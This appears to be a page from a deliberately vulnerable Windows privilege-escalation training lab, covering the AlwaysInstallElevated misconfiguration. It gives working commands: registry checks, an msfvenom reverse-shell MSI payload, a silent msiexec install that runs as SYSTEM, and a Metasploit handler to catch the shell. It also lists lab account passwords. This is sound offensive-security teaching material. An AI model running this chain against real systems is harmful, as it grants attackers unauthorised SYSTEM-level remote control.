🪟 Windows Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
Home Login Unquoted Paths AlwaysInstallElevated Weak Service Perms Token Impersonation DLL Hijacking Stored Credentials
⚠️ Pracivo Security Lab — Windows privilege escalation techniques. Start as low-privilege user, escalate to SYSTEM or Administrator.
Lab Credentials: ram / pracivo  |  alice / alice123  |  administrator / Admin@2024 (goal: escalate to this)

AlwaysInstallElevated

PRIVILEGE ESCALATION 
# If both registry keys are set to 1, any user can install MSI as SYSTEM

# Step 1: Check registry
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both must return 0x1 for this to work

# Step 2: Create malicious MSI with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f msi -o evil.msi

# Step 3: Install the MSI — runs as SYSTEM
msiexec /quiet /qn /i evil.msi

# Step 4: Catch the shell in metasploit
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST 10.10.10.1
set LPORT 4444
run
# Shell received as NT AUTHORITY\SYSTEM

# Automated check with PowerUp:
Get-RegistryAlwaysInstallElevated